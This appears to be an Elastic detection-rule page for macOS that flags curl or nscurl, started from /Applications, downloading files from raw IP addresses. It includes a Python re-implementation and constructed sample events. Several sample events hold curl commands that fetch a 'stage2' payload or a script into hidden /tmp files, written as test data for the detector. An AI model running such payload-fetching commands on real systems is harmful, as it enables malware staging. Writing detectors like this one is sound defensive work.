
Suspicious Curl from macOS Application

Elastic Detection Rules

Summary
This detection rule identifies suspicious executions of 'curl' by macOS applications, specifically attempts to download a payload from a raw IP address rather than a hostname. Threat actors often hide a malicious stage inside a benign-looking application that fetches the real payload at run time, and a download addressed directly to an IP is a common marker of that pattern. The rule is written in Elastic EQL (Event Query Language) and monitors process events for the execution of 'curl' or 'nscurl'. It matches on process arguments that indicate a file download whose target is an IP address, which is the step by which a malicious payload would be retrieved. The match is scoped to processes originating from the '/Applications' directory so that application-driven downloads are captured while false positives from legitimate behavior, such as software updates or other known benign operations, are kept to a minimum; environments with updaters that fetch from IP-addressed hosts may still need exclusions. Recommendations for investigation accompany the rule, highlighting the contextual information to analyze (the launching application, the download target and the file written) before taking response actions.
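To make the matching logic concrete, the following is an added example that re-implements the detection described above in plain Python over constructed ECS-style process events, so it can be run offline against sample data. It is not the Elastic rule's own EQL query: the field names, the list of download switches, the treatment of "originating from /Applications" (either the curl binary or its parent lives under that directory), the optional exclusion list and the sample events are all assumptions made for this illustration, and the IP addresses are documentation ranges.

```python
"""Added example: curl/nscurl download from a raw IP, launched from /Applications.
Not the rule's EQL; field names, flag handling and sample events are assumptions."""
import ipaddress
from urllib.parse import urlsplit

CURL_NAMES = {"curl", "nscurl"}
# curl switches that write the response body to disk, i.e. a file download.
LONG_DOWNLOAD_FLAGS = ("--output", "--remote-name")
# Short boolean switches that may be bundled in front of -o/-O, e.g. -fsSLo.
BOOLEAN_SHORT = set("sSLkfvigq4")


def has_download_flag(args):
    """True if any argument asks curl to save the body to a file (heuristic)."""
    for arg in args[1:]:  # args[0] is the program name
        if arg.startswith("--"):
            if arg.split("=", 1)[0] in LONG_DOWNLOAD_FLAGS:
                return True
        elif arg.startswith("-") and len(arg) > 1:
            bundle = arg[1:]
            # -o / -O alone, or a bundle of boolean switches ending in o/O.
            if bundle[-1] in "oO" and all(c in BOOLEAN_SHORT or c in "oO" for c in bundle[:-1]):
                return True
    return False


def url_host_is_ip(arg):
    """True if arg parses as a URL whose host is a literal IPv4/IPv6 address.
    'http://203.0.113.10/x' and 'http://[2001:db8::1]:8080/x' match;
    'http://1.2.3.4.example.com/' and 'http://example.com/1.2.3.4' do not."""
    if "://" not in arg:
        arg = "http://" + arg  # curl assumes http:// when no scheme is given
    try:
        host = urlsplit(arg).hostname
    except ValueError:  # malformed bracketed IPv6 and similar
        return False
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def is_suspicious(event, excluded_parents=()):
    """Apply the detection to one ECS-style process start event (assumed shape)."""
    if event.get("event.type") != "start":
        return False
    if event.get("process.name") not in CURL_NAMES:
        return False
    exe = event.get("process.executable") or ""
    parent = event.get("process.parent.executable") or ""
    # "Originating from /Applications": the curl binary is bundled inside an
    # app, or an app spawned the system curl (assumption about the rule's scope).
    if not (exe.startswith("/Applications/") or parent.startswith("/Applications/")):
        return False
    # Tuning knob (hypothetical): known updaters that legitimately fetch from IPs.
    if any(parent.startswith(p) for p in excluded_parents):
        return False
    args = event.get("process.args") or []
    return has_download_flag(args) and any(url_host_is_ip(a) for a in args[1:])


def detect(events, excluded_parents=()):
    """Return the indices of events that match the detection."""
    return [i for i, e in enumerate(events) if is_suspicious(e, excluded_parents)]


APP = "/Applications/FreeTool.app/Contents/MacOS/FreeTool"
SAMPLE_EVENTS = [  # constructed sample events, not from any real host
    {"event.type": "start", "process.name": "curl", "process.executable": "/usr/bin/curl",
     "process.parent.executable": APP,
     "process.args": ["curl", "-o", "/tmp/.s", "http://203.0.113.10/stage2"]},
    {"event.type": "start", "process.name": "curl", "process.executable": "/usr/bin/curl",
     "process.parent.executable": "/Applications/Updater.app/Contents/MacOS/Updater",
     "process.args": ["curl", "-fsSL", "https://updates.example.com/v2.dmg", "-o", "/tmp/v2.dmg"]},
    {"event.type": "start", "process.name": "curl", "process.executable": "/usr/bin/curl",
     "process.parent.executable": "/bin/zsh",
     "process.args": ["curl", "-O", "http://198.51.100.5/tool.sh"]},
    {"event.type": "start", "process.name": "curl", "process.executable": "/usr/bin/curl",
     "process.parent.executable": APP,
     "process.args": ["curl", "-I", "http://198.51.100.5/"]},
    {"event.type": "start", "process.name": "curl",
     "process.executable": "/Applications/FreeTool.app/Contents/Resources/curl",
     "process.parent.executable": APP,
     "process.args": ["curl", "-fsSLo", "/tmp/a", "http://[2001:db8::1]:8080/a"]},
    {"event.type": "start", "process.name": "curl", "process.executable": "/usr/bin/curl",
     "process.parent.executable": APP,
     "process.args": ["curl", "-o", "/tmp/n", "http://example.com/203.0.113.10.txt"]},
]

if __name__ == "__main__":
    for i in detect(SAMPLE_EVENTS):
        print("ALERT", i, " ".join(SAMPLE_EVENTS[i]["process.args"]))
```

Of the six constructed events only the first and fifth fire: a download to a hostname (second), a raw-IP download from a shell rather than an application (third), a HEAD request with no output switch (fourth) and an IP that appears only in the URL path (sixth) are all left alone. The URL parsing matters: a naive regex for dotted quads anywhere in the command line would have flagged the last case.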
Categories
  • macOS
  • Endpoint
Data Sources
  • Process
  • Application Log
ATT&CK Techniques
  • T1105 (Ingress Tool Transfer)
Created: 2026-01-30